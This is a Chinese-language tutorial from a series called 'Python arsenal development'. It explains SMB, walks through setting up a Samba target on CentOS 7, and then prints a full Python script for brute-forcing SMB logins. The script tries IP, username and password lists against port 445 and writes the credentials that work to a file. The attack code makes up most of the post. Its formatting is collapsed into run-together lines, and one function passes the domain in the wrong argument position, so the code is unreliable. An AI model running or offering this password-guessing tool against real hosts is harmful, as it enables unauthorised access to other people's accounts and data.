Python武器库开发-武器库篇之SMB服务暴力破解(五十五)

SMB服务（Server Message Block）是一种用于文件共享、打印机共享和其他资源共享的网络协议。它最初由IBM开发，后来被微软广泛采用。

SMB服务允许多台计算机在网络上共享文件和资源，从而实现文件的读取、写入和共享。通过SMB服务，用户可以访问其他计算机上的文件、打印机、文件夹和其他共享资源，就像访问本地资源一样。

SMB服务还提供了许多功能和特性，如权限控制、文件锁定、文件和目录的远程操作等。它通过TCP/IP协议在网络上进行通信，并使用NetBIOS或者TCP/IP的名称解析来定位和识别其他计算机上的共享资源。

SMB服务在Windows操作系统中得到广泛应用，并且被很多网络存储设备、打印机和其他网络设备所支持。它是实现文件共享和资源共享的重要协议之一，在企业和家庭网络中都有广泛的应用。

环境准备

首先，我们需要准备一台Centos7机器作为靶机在CentOS 7上配置SMB服务的步骤如下：

1. 确保CentOS 7已安装samba软件包，如果未安装，请使用以下命令进行安装：

sudo yum install samba

2. 使用文本编辑器打开SMB配置文件/etc/samba/smb.conf：

sudo vi /etc/samba/smb.conf

在配置文件中找到合适的全局配置部分（通常是以[global]开头），在其中添加以下内容：

[global]
security = user

这会将SMB服务器的安全模式设置为用户模式。

3. 在文件的末尾添加以下内容，定义要共享的文件夹和访问权限：

[share]path = /path/to/shared/foldervalid users = usernameread only = no

在上述示例中，将/path/to/shared/folder替换为您要共享的实际文件夹路径，并将username替换为允许访问此共享的用户名，然后保存并关闭配置文件。

4. 配置SMB用户，使用以下命令创建SMB用户，并设置密码：

sudo smbpasswd -a username

您可以将username替换为将用于访问共享的实际用户名，随后您将被提示输入新密码。

将新用户添加到sudo组，使其具有管理员权限，输入以下命令：

sudo usermod -aG wheel username

其中，"username"是你刚刚创建的新用户的名称。

5. 启动和启用SMB服务，使用以下命令启动SMB服务，并将其设置为在系统启动时自动启用：

sudo systemctl start smb
sudo systemctl enable smb

6. 在防火墙上配置SMB服务。如果防火墙启用了，您需要允许SMB服务的通信。使用以下命令添加防火墙规则：

sudo firewall-cmd --permanent --add-service=samba
sudo firewall-cmd --reload

完成后，您可以使用Windows或其他支持SMB协议的设备访问CentOS 7上的共享文件夹，这样，您就在CentOS 7上成功配置了SMB服务。

破解代码

下来我们用python写一段暴力破解SMB服务的代码，代码内容如下：

import os
from smb.SMBConnection import SMBConnection############################ Clear Consle While Start a Loop ##############################
def clear():os.system('cls')  # on Windows System############################ Collect Single Credential From User Input ##############################
def CollectCredential():remote_ip = input('Enter Host IP:')username = input('Enter SMB Username:')password = input('Enter SMB Password:')domain = input('Enter Domain Name:')return (remote_ip, username, password, domain)############################ Verify the Input File Direction ##############################
# If the direction cannot be found, set the input as an atribute.
def VerifyFile(up):ver = []try:file = open(up, 'r')data = file.readlines()print('File Direction Verified.')for line in data:ver.append(line.strip())except:ver.append(up)return verreturn ver############################ Collect File Directions From User Input ##############################
# Support IP, username, password SMB brute force attack,
# user can input single attributes replace one to three attributes with files
def CollectFiles():remote_ip = input('Enter Host IP or File Direction:')remote_ip = VerifyFile(remote_ip)username = input('Enter SMB Username or File Direction:')username = VerifyFile(username)password = input('Enter SMB Password or File Direction:')password = VerifyFile(password)domain = input('Enter Domain Name:')return (remote_ip, username, password, domain)############################ Generate Collected Credentials in to Files ##############################
def GenerateCredentials():try:with open("Credential.txt", mode='w', encoding='utf-8') as ff:for i in range(len(credential)):ff.write(credential[i] + ' ')if (i + 1) % 4 == 0:ff.write('\n')except FileNotFoundError:with open("Credential.txt", mode='w', encoding='utf-8') as ff:for i in range(len(credential)):ff.write(credential[i] + ' ')if (i + 1) % 4 == 0:ff.write('\n')############################ SMB Functions Using SMBConnection ##############################
class SMB(object):def __init__(self, remote_ip, username, password, domain):self.remote_ip = remote_ipself.username = usernameself.password = passwordself.domain = domain############################ Use the Single Credential CollectCredential() to Login ##############################def SingleLoginScanner(self):my_name = ""remote_name = ""try:self.conn = SMBConnection(self.username, self.password, my_name, remote_name, self.domain, use_ntlm_v2=True,sign_options=2, is_direct_tcp=True)connected = self.conn.connect(self.remote_ip, 445)if connected == True:print('Success :) %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (self.remote_ip, self.username, self.password, self.domain))credential.append(self.remote_ip)credential.append(self.username)credential.append(self.password)credential.append(self.domain)print("Credential", credential)else:print('False   :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (self.remote_ip, self.username, self.password, self.domain))self.conn.close()except Exception as e:print(e)############################ Use the Multiple Credentials CollectFiles() to Login ##############################def MultiLoginScanner(self):count = 0my_name = ""remote_name = ""for ip in self.remote_ip:for username in self.username:for password in self.password:count += 1try:self.conn = SMBConnection(username, password, self.domain, my_name, remote_name,use_ntlm_v2=True, sign_options=2, is_direct_tcp=True)connected = self.conn.connect(ip, 445)if connected == True:print('%d Success :) %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (count, ip, username, password, self.domain))credential.append(ip)credential.append(username)credential.append(password)credential.append(self.domain)print("Credential", credential)else:print('%d False   :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (count, ip, username, password, self.domain))self.conn.close()except Exception as e:print('%d False   :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' % (count, ip, username, password, self.domain))print(e)############################ SMB Functions Support User to Chose ##############################
def main():while (1):print('********************SMB PYTHON TOOKIT********************')print('1. Single credential SMB Login Scanner')print('2. Credentials list from file SMB Brute Force')print('3. Generate Collected Credentials')print('4. Quit')print('*********************************************************\n')chose = input('Type number to pick function:')if chose == '1':print('Only support to input single ip address, username and password.\n')remote_ip, username, password, domain = CollectCredential()smb = SMB(remote_ip, username, password, domain)smb.SingleLoginScanner()elif chose == '2':print('Support Local File Directories contain ip/username/password or they will be recognized as a string.\n')remote_ip, username, password, domain = CollectFiles()smb = SMB(remote_ip, username, password, domain)smb.MultiLoginScanner()elif chose == '3':print('Generating Successful Credentials in a txt file...\n')GenerateCredentials()print('Generated Credential.txt in the same python Directory.\n')else:print('Please input valid number!\n')clear()if __name__ == '__main__':credential = []main()

这段代码是一个SMB（Server Message Block）登录工具的Python脚本，用于验证SMB登录的凭据。

首先，脚本导入了os和SMBConnection模块。

然后定义了一个clear函数，用于在启动循环时清除控制台。

接下来是CollectCredential函数，用于从用户输入中收集单个凭据，包括远程主机IP、SMB用户名、SMB密码和域名。

VerifyFile函数用于验证输入文件路径是否正确。如果路径找不到，它会将输入文件路径设置为一个属性。

CollectFiles函数用于从用户输入中收集文件路径。支持输入单个属性，用文件替换一个到三个属性。

GenerateCredentials函数用于将收集到的凭据生成为文本文件。

SMB类是一个SMB的封装类，包含了SMB登录的各种功能。

SingleLoginScanner函数用于使用单个凭据登录。

MultiLoginScanner函数用于使用多个凭据登录。

main函数是脚本的主函数，用于选择SMB登录功能。根据用户的选择，调用相应的函数。

最后，在脚本的主模块中定义了一个空的credential列表，用于存储登录成功的凭据。

当脚本作为独立的程序运行时，会调用main函数开始执行。

运行实验

接下来我们在实际运行这段代码试验一下，如图程序首先会要求我们选择一个破解的选项，我们这里选择 1 ，（单凭据破解）：

随后程序会要求我们输入要破解的SMB服务的主机IP地址、登录用户名和破解密码，这里我们输入，域名如果没有的话我们可以选择不输入：

最后，如图我们成功登录了SMB服务：